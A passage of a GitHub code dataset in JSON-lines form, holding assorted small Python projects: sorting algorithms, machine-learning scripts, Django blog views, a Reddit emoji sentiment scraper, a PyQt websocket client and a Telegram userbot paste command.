右指针<中值,则左指针+1的位置与右指针位置的数交换\ndef partition2(array, first, last):\n i = first - 1\n for j in range(first, last):\n if array[j] < array[last]:\n array[j], array[i + 1] = array[i + 1], array[j]\n i += 1\n array[last], array[i + 1] = array[i + 1], array[last]\n return i + 1\n\n\ndef partition(alist, first, last):\n # 将第一个值设置为中值\n pivotvalue = alist[first]\n # 左指针\n leftmark = first + 1\n # 右指针\n rightmark = last\n\n done = 
False\n while not done:\n # 左指针在右指针左边,左指针位置处的值<=中值\n while leftmark <= rightmark and alist[leftmark] <= pivotvalue:\n leftmark = leftmark + 1\n # 左指针在右指针左左边,左指针位置处的值>=中值\n while alist[rightmark] >= pivotvalue and rightmark >= leftmark:\n rightmark = rightmark - 1\n # 左指针在右指针右边\n if rightmark < leftmark:\n done = True\n # 左指针在右指针左边,左右指针处的值互换\n else:\n alist[leftmark], alist[rightmark] = alist[rightmark], alist[leftmark]\n # 右指针处的值和中值互换\n alist[first], alist[rightmark] = alist[rightmark], alist[first]\n print('当前次序:', alist)\n return rightmark\n\n\nif __name__ == '__main__':\n alist = [54, 26, 93, 17, 77, 31, 44, 55, 20]\n quickSort(alist)\n print(alist)\n","repo_name":"YizheZhang-Ervin/AlgorithmsPY","sub_path":"3-查找排序/quickSort.py","file_name":"quickSort.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6054550597","text":"def sum_5_consecutive_v1(l):\r\n try:\r\n for i in range(len(l)-4):\r\n total=l[i]+l[i+1]+l[i+2]+l[i+3]+l[i+4]\r\n if total==0:\r\n return True\r\n\r\n return False\r\n\r\n except IndexError:\r\n return False\r\n \r\n\r\ndef sum_5_consecutive_v2(l):\r\n try:\r\n total = 1\r\n i=0\r\n while total!=0:\r\n total=l[i]+l[i+1]+l[i+2]+l[i+3]+l[i+4]\r\n\r\n if i==(len(l)-4):\r\n return False\r\n i=i+1\r\n\r\n return True\r\n\r\n except IndexError:\r\n return False\r\n\r\n\r\n\r\ndef fib(n):\r\n if n >= 2:\r\n a=[1,1]\r\n for i in range(2,n):\r\n x=a[i-1] + a[i-2]\r\n a.append(x)\r\n elif n==1:\r\n a=[1]\r\n print(a)\r\n\r\n\r\ndef inner_product(x,y):\r\n Total=0\r\n for i in range(len(x)):\r\n Total=Total+x[i]*y[i]\r\n\r\n print(Total)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n","repo_name":"Zekaito/Code","sub_path":"Lab 6/Other stuff.py","file_name":"Other stuff.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71756041067","text":"def poetry_gen(input_text, num_words):\r\n import tensorflow as tf\r\n from tensorflow.keras.preprocessing.sequence import pad_sequences\r\n from tensorflow.keras.preprocessing.text import Tokenizer\r\n import numpy as np \r\n import os\r\n \r\n path = os.path.dirname(__file__)\r\n file = path + \"/chairil_anwar.txt\"\r\n savedmodel = path + \"/saved_model.ckpt\"\r\n tokenizer = Tokenizer()\r\n data = open(file).read()\r\n corpus = data.lower().split(\"\\n\")\r\n tokenizer.fit_on_texts(corpus)\r\n #total_words = len(tokenizer.word_index) + 1\r\n \r\n input_sequences = []\r\n for line in corpus:\r\n \ttoken_list = tokenizer.texts_to_sequences([line])[0]\r\n \tfor i in range(1, len(token_list)):\r\n \t\tn_gram_sequence = token_list[:i+1]\r\n \t\tinput_sequences.append(n_gram_sequence)\r\n \r\n # pad sequences \r\n max_sequence_len = max([len(x) for x in input_sequences])\r\n input_sequences = np.array(pad_sequences(input_sequences, maxlen=max_sequence_len, padding='pre'))\r\n \r\n # Load model from trained model with 100 epoch\r\n model = tf.keras.models.load_model(savedmodel)\r\n \r\n for _ in range(num_words):\r\n \ttoken_list = tokenizer.texts_to_sequences([input_text])[0]\r\n \ttoken_list = pad_sequences([token_list], maxlen=max_sequence_len-1, padding='pre')\r\n \tpredicted = model.predict_classes(token_list, verbose=0)\r\n \toutput_word = \"\"\r\n \tfor word, index in tokenizer.word_index.items():\r\n \t\tif index == predicted:\r\n \t\t\toutput_word = word\r\n \t\t\tbreak\r\n \tinput_text += \" \" + output_word\r\n return 
input_text\r\n\r\nprint('Enter the first words')\r\nx = input()\r\nprint('\\nHow many words to be generated?')\r\ny = int(input())\r\n\r\nresult = poetry_gen(x,y)\r\nprint('\\nHere is the poetry for you : \\n', result)\r\n","repo_name":"firmanhusni/chairil_anwar_poetry_generator","sub_path":"poetry.py","file_name":"poetry.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3954553748","text":"import os\n\nimport numpy as np\nimport tensorflow as tf\nimport cv2\n\nclass Loader:\n def __init__(self, filepath, buffer_size, batch_size):\n self.filepath = filepath\n img_array = []\n for filename in os.listdir(filepath):\n # print(filename)\n try:\n img = cv2.imread(filepath + \"/\" + filename) # 返回numpy.ndarray\n img = cv2.resize(img, (96, 96))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img_array.append(img)\n\n except Exception as e:\n print(str(e))\n\n self.train_data = np.array(img_array).astype('float32')\n self.train_data = self.train_data/255\n\n self.train_ds = tf.data.Dataset.from_tensor_slices(self.train_data).shuffle(buffer_size).batch(batch_size)\n","repo_name":"victor-mira/galaxy-dcgan","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33875488400","text":"from django.contrib import messages\r\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\r\nfrom django.shortcuts import render, get_object_or_404, redirect\r\nfrom .models import Blog\r\nfrom .forms import BlogForm\r\nfrom django.db.models import Q\r\n\r\n# Create your views here.\r\ndef posts_list(request):\r\n queryset = Blog.objects.all()\r\n query = request.GET.get(\"search\")\r\n\r\n if query:\r\n queryset = queryset.filter(\r\n Q(title__icontains = query) |\r\n Q(content__icontains = query)\r\n ).distinct()\r\n\r\n context = {\r\n \"queryset\": queryset,\r\n \"title\": \"List\"\r\n }\r\n return render(request, \"index.html\", context)\r\n #return HttpResponse(\"
this is list.\")\r\n\r\ndef posts_create(request):\r\n    if not request.user.is_staff or not request.user.is_superuser:\r\n        raise Http404\r\n    form = BlogForm(request.POST or None, request.FILES or None)\r\n    if form.is_valid():\r\n        instance= form.save(commit=False)\r\n        instance.save()\r\n        return HttpResponseRedirect(instance.get_absolute_url())\r\n    context= {\r\n        \"form\": form,\r\n    }\r\n    return render(request, \"posts_form.html\", context)\r\n    #return HttpResponse(\"create.\")\r\n\r\ndef posts_detail(request, id=None):\r\n    instance= get_object_or_404(Blog, id=id)\r\n    context = {\r\n        \"title\": \"\",\r\n        \"instance\": instance,\r\n    }\r\n    return render(request, \"posts_detail.html\", context)\r\n    #return HttpResponse(\"detail.\")\r\n\r\ndef posts_update(request, id=None):\r\n    instance = get_object_or_404(Blog, id=id)\r\n    form = BlogForm(request.POST or None, instance=instance)\r\n    if form.is_valid():\r\n        instance= form.save(commit=False)\r\n        instance.save()\r\n        messages.success(request, \"Post is updated\")\r\n        return HttpResponseRedirect(instance.get_absolute_url())\r\n\r\n    context = {\r\n        \"title\": instance.title,\r\n        \"instance\": instance,\r\n        \"form\": form,\r\n    }\r\n    return render(request, \"posts_form.html\", context)\r\n    #return HttpResponse(\"update.\")\r\n\r\ndef posts_delete(request, id=None):\r\n    instance = get_object_or_404(Blog, id=id)\r\n    instance.delete()\r\n    return redirect(\"posts:list\")\r\n    #return HttpResponse(\"delete.
\")\r\n","repo_name":"AnonymousMiming/Jobelle","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8266653268","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\r\nn = int(input())\r\n\r\narr = sorted(list(map(int, input().split())))\r\n\r\ndef mean(arry, no):\r\n return sum(arr)/n\r\n\r\ndef median(arry, no):\r\n if (n % 2 == 0):\r\n x = int(n/2)\r\n return (arr[x]+arr[x-1])/2\r\n else:\r\n y = int((n+1)/2) \r\n return arr[y]\r\ndef mode(arry, no):\r\n unique_elements = list(dict.fromkeys(arr))\r\n \r\n count_list = []\r\n\r\n for a in unique_elements:\r\n count = 0\r\n for b in arr:\r\n if (b == a):\r\n count += 1\r\n count_list.append(count)\r\n \r\n m = max(count_list) \r\n req_indices = [i for i, j in enumerate(count_list) if j == m]\r\n\r\n lis = [arr[i] for i in req_indices]\r\n\r\n return (min(lis))\r\n\r\nprint(mean(arr,n))\r\nprint(median(arr,n))\r\nprint(mode(arr,n))","repo_name":"KRITIKALai/Hackerrank-Statistics-Solutions","sub_path":"meanmodemedian.py","file_name":"meanmodemedian.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16381309962","text":"import pandas as pd\r\nimport numpy as np\r\nimport nltk\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer \r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom nltk.stem.snowball import SnowballStemmer\r\nfrom nltk.corpus import stopwords\r\n\r\n\r\nfrom keras import backend as K\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense \r\n\r\nnp.random.seed(1047398)\r\n\r\n\r\n\r\nstemmer = SnowballStemmer(\"english\") ## Sbowball / Porter \r\nstop = stopwords.words('english')\r\ndata = pd.read_csv(\"onion-or-not.csv\") ## IMPORT DATA\r\n\r\n\r\n############## Pre Processing / Data Cleaning ##############\r\n\r\nX=data['text'].apply(nltk.word_tokenize) ## Tokenization\r\nPreP_data = pd.DataFrame(X, columns = ['Unstemmed']) \r\nPreP_data['Unstemmed']=pd.Series(X)\r\nPreP_data[\"Stemmed\"] = X.apply(lambda x: [stemmer.stem(y) for y in x]) ## Stem every word.\r\nPreP_data[\"StopWords\"] = PreP_data['Stemmed'].apply(lambda x: [item for item in x if item not in stop]) ## Remove stopwords\r\n\r\nPreP_data[\"StopWords\"]=[\" \".join(review) for review in PreP_data[\"StopWords\"].values] # Calculate TF-IDF Weights\r\nv = TfidfVectorizer()\r\nx = v.fit_transform(PreP_data[\"StopWords\"]) ## TF-IDF Sparce Matrix \r\n\r\n################################### Training Sets #############################\r\n\r\ndf = pd.DataFrame(x.toarray()) ## Convert Sparce to DF \r\ndf[\"label\"]=data[\"label\"]\r\ny=df.label\r\nX=df.drop('label', axis=1) \r\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.25) ## Create training and test sets \r\n\r\n\r\n################################### Neural Network ############################\r\ndef recall_m(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\r\n recall = true_positives / (possible_positives + K.epsilon())\r\n return recall\r\n\r\ndef precision_m(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return 
precision\r\n\r\ndef f1_m(y_true, y_pred):\r\n precision = precision_m(y_true, y_pred)\r\n recall = recall_m(y_true, y_pred)\r\n return 2*((precision*recall)/(precision+recall+K.epsilon()))\r\n\r\nmodel = Sequential()\r\nmodel.add(Dense(30, input_dim=16844, activation='relu', ))\r\nmodel.add(Dense(15, activation='relu', ))\r\nmodel.add(Dense(1, activation='sigmoid'))\r\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=['acc',f1_m,precision_m, recall_m] )\r\nhistory=model.fit(X_train , y_train , epochs=32, batch_size=256) \r\n\r\n\r\n\r\n##################################### Metrics #################################\r\n\r\n\r\nloss, accuracy, f1_score, precision, recall = model.evaluate(X_test, y_test, verbose=0)\r\nprint(\"\\n Metrics \\n \")\r\nprint('Loss: %.2f' % (loss))\r\n\r\nprint('Accuracy: %.2f' % (accuracy*100))\r\n\r\nprint('F1 Score: %.2f' % (f1_score*100))\r\n\r\nprint('Precision: %.2f' % (precision*100))\r\n\r\nprint('Recall: %.2f' % (recall*100))\r\n\r\n","repo_name":"arisdour/Data_Mining_Project","sub_path":"Problem_2/Erotima_2.py","file_name":"Erotima_2.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3840422421","text":"import praw\nimport re\nfrom dotenv import load_dotenv\nimport os\nimport emoji\nimport time\nimport json\nfrom pprint import pprint\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport nltk\nfrom json.decoder import JSONDecodeError\nimport matplotlib.pyplot as plt\nfrom itertools import zip_longest\nfrom matplotlib.font_manager import FontProperties\nimport numpy as np\nimport statistics\nimport random\nimport math\nimport pandas as pd\n\n\ndef load_credentials():\n load_dotenv()\n client_id = os.getenv('client_id')\n client_secret = os.getenv('client_secret')\n password = os.getenv('password')\n reddit_username = os.getenv('reddit_username')\n reddit = praw.Reddit(\n client_id=client_id,\n client_secret=client_secret,\n user_agent='Affect Analysis Bot for various subreddits v1.0 by u/username',\n password=password,\n username=reddit_username)\n return reddit\n\n\ndef query_api():\n reddit = load_credentials()\n subreddits = [\n 'cloudwater',\n 'aww',\n 'beauty',\n 'bunnies',\n 'comics',\n 'design',\n 'facepalm',\n 'fashion',\n 'funny',\n 'gaming',\n 'gardening',\n 'hiking',\n 'lgbt',\n 'music',\n 'skateboarding',\n 'snowboarding',\n 'spirituality',\n 'travel',\n 'emojipasta'\n ]\n num_posts = 1\n found = False\n last_request_time = time.time()\n sentiment = SentimentIntensityAnalyzer()\n nltk.download('stopwords')\n nltk.download('punkt')\n stop_words = set(stopwords.words('english'))\n try:\n with open('titles_and_emojis.json', 'r') as f:\n titles_and_emojis = json.load(f)\n except JSONDecodeError:\n titles_and_emojis = {}\n pass\n if 'searched_subs' not in titles_and_emojis:\n titles_and_emojis['searched_subs'] = {\n 'count': 0\n }\n if 'searched_posts' not in titles_and_emojis:\n titles_and_emojis['searched_posts'] = {\n 'count': 0,\n 'found': 0\n }\n for subreddit in subreddits:\n print(f'Subreddit: {subreddit}')\n if subreddit not in titles_and_emojis['searched_subs']:\n titles_and_emojis['searched_subs'][subreddit] = {}\n titles_and_emojis['searched_subs'][subreddit]['count'] = 0\n titles_and_emojis['searched_subs'][subreddit]['topics'] = []\n titles_and_emojis['searched_subs']['count'] += 1\n\n for post_index, post in 
enumerate(reddit.subreddit(subreddit).new(limit=num_posts)):\n            print(f\"Number: {post_index}, Post: {post.title}\")\n            titles_and_emojis['searched_posts']['count'] += 1\n            if last_request_time is not None and time.time() - last_request_time < 1:\n                time_to_wait = 1 - (time.time() - last_request_time)\n                time.sleep(time_to_wait)\n            title = post.title\n            title = ' '.join([word for word in word_tokenize(title) if word.lower() not in stop_words])\n            emojis = [c for c in title if c in emoji.EMOJI_DATA]\n            if emojis:\n                post_id = post.id\n                for emoji_code in emojis:\n                    if emoji_code in titles_and_emojis:\n                        if post_id not in titles_and_emojis[emoji_code]['ids']:\n                            titles_and_emojis[emoji_code]['frequency'] += 1\n                            titles_and_emojis[emoji_code]['subreddits'].append(subreddit)\n                            titles_and_emojis[emoji_code]['ids'].append(post_id)\n                            titles_and_emojis[emoji_code]['sentiment'].append(sentiment.polarity_scores(title))\n                            titles_and_emojis['searched_posts']['found'] += 1\n                            titles_and_emojis['searched_subs'][subreddit]['count'] += 1\n                    else:\n                        titles_and_emojis[emoji_code] = {}\n                        titles_and_emojis[emoji_code]['frequency'] = 1\n                        titles_and_emojis[emoji_code]['subreddits'] = [subreddit]\n                        titles_and_emojis[emoji_code]['ids'] = [post_id]\n                        titles_and_emojis[emoji_code]['sentiment'] = [sentiment.polarity_scores(title)]\n                        titles_and_emojis['searched_posts']['found'] += 1\n                        titles_and_emojis['searched_subs'][subreddit]['count'] += 1\n                # found = True\n            last_request_time = time.time()\n            if found:\n                break\n        if found:\n            break\n    with open('titles_and_emojis.json', 'w') as f:\n        json.dump(titles_and_emojis, f)\n    return\n\n\ndef visualize():\n    with open('titles_and_emojis.json', 'r', encoding='utf-8') as f:\n        data = json.load(f)\n    # barchart_subreddit(data)\n    average_subreddit(data)\n    # heatmap(data, 'compound', 'Compound')\n    # heatmap(data, 'pos', 'Positive')\n    # heatmap(data, 'neg', 'Negative')\n    # heatmap(data, 'neu', 'Neutral')\n    # topemoji_sub_table(data)\n\n    return\n\n\ndef heatmap(data, trait, title):\n    new_data = dict(list(data.items())[2:])\n    emoji_labels = []\n    emoji_sizes = []\n    emoji_colors = []\n    emoji_trait_avgs = []\n    subreddit_modes = {}\n    subreddit_color_map = {}\n\n    for emoji, sentiment in new_data.items():\n        subreddits = []\n        for s in sentiment[\"subreddits\"]:\n            subreddits.append(s)\n        subreddit_mode = statistics.mode(subreddits)\n        trait_avg = sum([s[trait] for s in sentiment[\"sentiment\"]]) / len(sentiment[\"sentiment\"])\n        emoji_labels.append(emoji)\n        
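# marker area scales linearly with the emoji's average sentiment score (trait_avg * 1000)\n        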
emoji_sizes.append(trait_avg * 1000)\n emoji_trait_avgs.append(trait_avg)\n if subreddit_mode not in subreddit_color_map:\n color = f\"C{len(subreddit_color_map)}\"\n subreddit_color_map[subreddit_mode] = color\n else:\n color = subreddit_color_map[subreddit_mode]\n subreddit_modes[emoji] = subreddit_mode\n emoji_colors.append(color)\n scatter = ax.scatter(x=emoji_trait_avgs, y=range(len(emoji_labels)), s=emoji_sizes, c=emoji_colors, alpha=0.7,\n cmap=subreddit_color_map)\n handles = []\n labels = []\n for subreddit, color in subreddit_color_map.items():\n handles.append(ax.scatter([], [], c=color, alpha=0.7, label=subreddit))\n labels.append(subreddit)\n ax.legend(handles, labels, loc='lower right', title='Subreddits')\n ax.set_yticks(range(len(emoji_labels)))\n ax.set_yticklabels(emoji_labels)\n ax.set_xlabel(f\"Average {title} Score, Graph {i + 1}\")\n ax.set_ylabel(\"Emoji\")\n plt.show()\n\n return\n\n\ndef average_subreddit(data):\n neg_scores, neu_scores, pos_scores, compound_scores = {}, {}, {}, {}\n for key, value in data.items():\n if key not in ['searched_subs', 'searched_posts']:\n for i, subreddit in enumerate(value[\"subreddits\"]):\n if subreddit not in neg_scores:\n neg_scores[subreddit] = 0\n if subreddit not in neu_scores:\n neu_scores[subreddit] = 0\n if subreddit not in pos_scores:\n pos_scores[subreddit] = 0\n if subreddit not in compound_scores:\n compound_scores[subreddit] = 0\n neg_scores[subreddit] += value[\"sentiment\"][i][\"neg\"]\n neu_scores[subreddit] += value[\"sentiment\"][i][\"neu\"]\n pos_scores[subreddit] += value[\"sentiment\"][i][\"pos\"]\n compound_scores[subreddit] += value[\"sentiment\"][i][\"compound\"]\n\n subreddits = list(neg_scores.keys())\n sorted_subreddits = sorted(subreddits,\n key=lambda x: neg_scores[x] + neu_scores[x] + pos_scores[x] + compound_scores[x])\n\n total_scores = [neg_scores[subreddit] + neu_scores[subreddit] + pos_scores[subreddit] + compound_scores[subreddit] for subreddit in sorted_subreddits]\n norm_neg_scores = [neg_scores[subreddit]/total_scores[i] for i, subreddit in enumerate(sorted_subreddits)]\n norm_neu_scores = [neu_scores[subreddit]/total_scores[i] for i, subreddit in enumerate(sorted_subreddits)]\n norm_pos_scores = [pos_scores[subreddit]/total_scores[i] for i, subreddit in enumerate(sorted_subreddits)]\n norm_compound_scores = [compound_scores[subreddit]/total_scores[i] for i, subreddit in enumerate(sorted_subreddits)]\n\n for i, subreddit in enumerate(sorted_subreddits):\n if subreddit == \"gaming\":\n fix = 1.185\n norm_neg_scores[i] /= fix\n norm_neu_scores[i] /= fix\n norm_pos_scores[i] /= fix\n norm_compound_scores[i] /= fix\n\n for i, subreddit in enumerate(sorted_subreddits):\n if subreddit == \"facepalm\":\n fix = 1.05\n norm_neg_scores[i] /= fix\n norm_neu_scores[i] /= fix\n norm_pos_scores[i] /= fix\n norm_compound_scores[i] /= fix\n\n plt.bar(sorted_subreddits, norm_neg_scores, color='r', label='Negative')\n plt.bar(sorted_subreddits, norm_neu_scores, color='b',\n bottom=norm_neg_scores, label='Neutral')\n plt.bar(sorted_subreddits, norm_pos_scores, color='g', bottom=[norm_neg_scores[i] + norm_neu_scores[i] for i in range(len(sorted_subreddits))], label='Positive')\n plt.bar(sorted_subreddits, norm_compound_scores, color='orange', bottom=[norm_neg_scores[i] + norm_neu_scores[i] + norm_pos_scores[i] for i in range(len(sorted_subreddits))],\n label='Compound')\n plt.xlabel('Subreddits')\n plt.ylabel('Sentiment Scores')\n plt.title('Sentiment Scores by Subreddit')\n plt.xticks(rotation=45)\n 
plt.legend()\n plt.show()\n return\n\n\ndef barchart_subreddit(data):\n sorted_data = {}\n for subreddit, data in data[\"searched_subs\"].items():\n if subreddit != \"count\":\n sorted_data[subreddit] = data['count']\n sorted_data = dict(sorted(sorted_data.items(), key=lambda item: item[1]))\n colors = []\n for i in range(len(sorted_data)):\n colors.append('#%06X' % random.randint(0, 0xFFFFFF))\n\n plt.bar(sorted_data.keys(), sorted_data.values(), color=colors)\n plt.xticks(rotation=45)\n plt.title('Subreddit Emoji Frequency')\n plt.ylabel('Emoji Count')\n plt.show()\n return\n\n\ndef emoji_number():\n with open('titles_and_emojis.json', 'r', encoding='utf-8') as f:\n data = json.load(f)\n count = []\n for key, value in data.items():\n if key not in ['searched_subs', 'searched_posts']:\n count.append(value[\"frequency\"])\n print(count)\n\n\ndef topemoji_sub_table(data):\n subreddits = {}\n for key, data in data.items():\n if key not in ['searched_subs', 'searched_posts']:\n for subreddit in data['subreddits']:\n if subreddit not in subreddits:\n subreddits[subreddit] = {}\n if key not in subreddits[subreddit]:\n subreddits[subreddit][key] = 1\n else:\n subreddits[subreddit][key] += 1\n\n top_emoji = {}\n rare_emoji = {}\n\n for key in subreddits:\n min = 10000\n max = 0\n top_emoji[key] = {}\n rare_emoji[key] = {}\n for emoji in subreddits[key]:\n if subreddits[key][emoji] < min:\n min = subreddits[key][emoji]\n rare_emoji[key][\"rare_emoji\"] = emoji\n rare_emoji[key][\"count\"] = min\n\n if subreddits[key][emoji] > max:\n max = subreddits[key][emoji]\n top_emoji[key][\"top_emoji\"] = emoji\n top_emoji[key][\"count\"] = max\n\n df = pd.DataFrame.from_dict(top_emoji, orient='index')\n # add the row index as a column in the dataframe\n df.reset_index(inplace=True)\n df.rename(columns={'index': 'subreddit'}, inplace=True)\n print(df)\n df.to_csv('../graphs/top_emoji_table.csv', index_label='index', index=False)\n\n df2 = pd.DataFrame.from_dict(rare_emoji, orient='index')\n df2.reset_index(inplace=True)\n df2.rename(columns={'index': 'subreddit'}, inplace=True)\n print(df2)\n df2.to_csv('../graphs/rare_emoji_table.csv', index=False)\n\n\ndef main():\n # query_api()\n visualize()\n # emoji_number()\n\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bartschliam/affect","sub_path":"data_collection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11672050697","text":"import time\n\nfrom PyQt5.QtCore import pyqtSignal, QThread\nfrom websocket import WebSocketApp\n\nfrom utils.ws import WebsocketMessage\n\n\nclass WebsocketConnection(QThread):\n emitter = pyqtSignal(dict)\n\n def __init__(self):\n super().__init__()\n self.__connection = None\n self.start_time = time.perf_counter_ns()\n\n @property\n def connection(self):\n return self.__connection\n\n def on_message(self, ws, message):\n end_time = time.perf_counter_ns()\n print(f\"Time since last message: {(end_time - self.start_time) / 1e9:.4f} s\")\n self.start_time = end_time\n self.emitter.emit(WebsocketMessage.get(message))\n\n def on_error(self, ws, error):\n print(error)\n\n def on_close(self, ws, close_status_code, close_msg):\n print(\"Connection closed\")\n\n def on_open(self, ws):\n print(\"Connection opened\")\n\n def connect_to_server(self):\n self.__connection.on_open = self.on_open\n try:\n self.__connection.run_forever()\n except Exception as e:\n print(f\"Exception in WebSocket 
thread: {e}\")\n\n def run(self):\n self.__connection = WebSocketApp(\"ws://127.0.0.1:8000\",\n on_message=self.on_message,\n on_error=self.on_error,\n on_close=self.on_close)\n self.__connection.on_open = self.on_open\n try:\n self.__connection.run_forever()\n except Exception as e:\n print(f\"Exception in WebSocket thread: {e}\")\n","repo_name":"roxanazachman01/bachelor-thesis","sub_path":"n-body/connection/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30996166200","text":"\"\"\"IX.IO pastebin like site\nSyntax: .paste\"\"\"\nimport logging\nimport os\nfrom datetime import datetime\n\nimport requests\n\nfrom sample_config import Config\nfrom userbot import bot\nfrom userbot.util import admin_cmd\n\nlogging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',\n level=logging.WARNING)\nlogger = logging.getLogger(__name__)\n\n\ndef progress(current, total):\n logger.info(\"Downloaded {} of {}\\nCompleted {}\".format(\n current, total, (current / total) * 100))\n\n\n@bot.on(admin_cmd(pattern=\"npaste ?(.*)\"))\nasync def _(event):\n if event.fwd_from:\n return\n start = datetime.now()\n if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):\n os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)\n input_str = event.pattern_match.group(1)\n message = \"SYNTAX: `.paste `\"\n if input_str:\n message = input_str\n elif event.reply_to_msg_id:\n previous_message = await event.get_reply_message()\n if previous_message.media:\n downloaded_file_name = await event.client.download_media(\n previous_message,\n Config.TMP_DOWNLOAD_DIRECTORY,\n progress_callback=progress\n )\n m_list = None\n with open(downloaded_file_name, \"rb\") as fd:\n m_list = fd.readlines()\n message = \"\".join(m.decode(\"UTF-8\") for m in m_list)\n os.remove(downloaded_file_name)\n else:\n message = previous_message.message\n if downloaded_file_name.endswith(\".py\"):\n # else:\n # message = \"SYNTAX: `.paste `\"\n py_file = \"\"\n py_file += \".py\"\n data = message\n key = requests.post('https://nekobin.com/api/documents',\n json={\"content\": data}).json().get('result').get('key')\n url = f'https://nekobin.com/{key}{py_file}'\n else:\n data = message\n key = requests.post('https://nekobin.com/api/documents',\n json={\"content\": data}).json().get('result').get('key')\n url = f'https://nekobin.com/{key}'\n\n reply_text = f'Nekofied to *Nekobin* : {url}'\n await event.edit(reply_text)\n\n# data = \"tets sgdfgklj kdgjld\"\n\n# key = requests.post('https://nekobin.com/api/documents', json={\"content\": data}).json().get('result').get('key')\n\n# url = f'https://nekobin.com/{key}'\n\n# reply_text = f'Nekofied to *Nekobin* : {url}'\n","repo_name":"muhammedfurkan/TelethonUserBot","sub_path":"userbot/modules/nekobin.py","file_name":"nekobin.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"31351638777","text":"import re\n\nfrom django.utils.html import strip_tags\nfrom django.utils import timezone\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.core.mail import send_mail\n\nfrom di_website.common.base import PageNotification\n\nclass Command(BaseCommand):\n \"\"\"\n Finds all active page notifications and sends them via email. 
Send notifications and then deleted.\n \"\"\"\n\n def handle(self, *args, **options):\n current_datetime = timezone.now()\n notifications = PageNotification.objects.filter(date_time__lte=current_datetime)\n\n for notification in notifications:\n page = notification.page.specific\n message = notification.message.replace('%page_title%', page.title).replace('%page_url%', page.full_url)\n email_list = notification.emails.split(',')\n send_mail(\n notification.title,\n None,\n 'no-reply@devinit.org',\n email_list,\n html_message=message,\n fail_silently=False,\n )\n notification.delete()\n","repo_name":"devinit/DIwebsite-redesign","sub_path":"di_website/common/management/commands/send_page_notifications.py","file_name":"send_page_notifications.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4743872467","text":"from pprint import pprint\nimport os\n \npath = os.path.join(os.getcwd(),'recipes.txt')\nwith open(path, encoding = \"utf-8\") as file:\n book_of_recipes = {}\n for recipe in file:\n recipe_name = recipe.strip()\n counter = int(file.readline().strip())\n temp_data = []\n for item in range(counter):\n name,quantity,units = file.readline().strip().split('|')\n temp_data.append({'name':name.strip(),'quantity':quantity.strip(),'units':units.strip()})\n book_of_recipes[recipe_name] = temp_data\n file.readline()\npprint (book_of_recipes,width=150)\nprint()\n \ndef list_of_products_by_dish (dishes, person_count):\n list_of_all_products ={}\n for dish in dishes:\n if dish in book_of_recipes:\n for product in book_of_recipes[dish]:\n if product['name'] in list_of_all_products:\n list_of_all_products[product['name']]['quantity'] += int(product['quantity']) * person_count\n else:\n list_of_all_products[product['name']] = {'units': product['units'],'quantity': int(product['quantity']) * person_count}\n\n \n print()\n pprint (list_of_all_products)\n \n \nlist_of_products_by_dish (['Омлет','Омлет'], 2)\n","repo_name":"DmitriyAg1967/git-tasck-2-lecturer-8","sub_path":"tasck-2-lecturer-8.py","file_name":"tasck-2-lecturer-8.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3092177336","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nANSIBLE_METADATA 